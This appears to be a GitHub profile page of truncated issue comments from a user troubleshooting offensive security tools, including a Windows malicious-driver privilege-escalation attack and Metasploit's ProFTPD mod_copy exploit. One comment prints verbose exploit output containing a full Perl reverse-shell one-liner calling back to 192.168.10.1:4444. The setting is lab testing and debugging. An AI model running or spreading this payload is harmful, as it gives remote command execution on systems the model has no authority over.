Florablia

Results 8 comments of Florablia

This is my work laptop, so IT group may have made changes without informing us but I've seen nothing out of the ordinary. Your link sends me to a 404....

Same problem here, I've narrowed it down a bit: The malicious driver is loaded in the driver folder, but the call to reinstall a valid driver (in order to load...

Correction: Create a new lowprivilege user. Powershell command: new-localuser -name "test" prompt for password (care to follow password policy) relaunch attack using the newly created lowpriv user. Attack works. Windows...

Output with verbose & HttpTrace true: ``` msf5 exploit(unix/ftp/proftpd_modcopy_exec) > run [+] perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.10.1:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(){if($_=~ /(.*)/){system $1;}};' [*] Started reverse TCP handler on 192.168.10.1:4444 [*]...

### EDIT exploit working with the TEST installation of proftpd. The problem was...php was not installed on the server -_- (sry for the stupidity) Still not working with the DEFAULT...

I've already tested the server response by directly connecting with ftp, it sends me back a 220 banner: `220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.103.4]` But to be sure...

### Corrected So, I've made some tests comparing the conf file from TEST installation and the one for Default installation. Turns out I had to use `UseReverseDNS off` in the...

Found out after reviewing the code that the problem comes from the Security.go file, where a list of rejectedIPv4Networks is set. No luck, my new network use IP 10.3.3.3 for...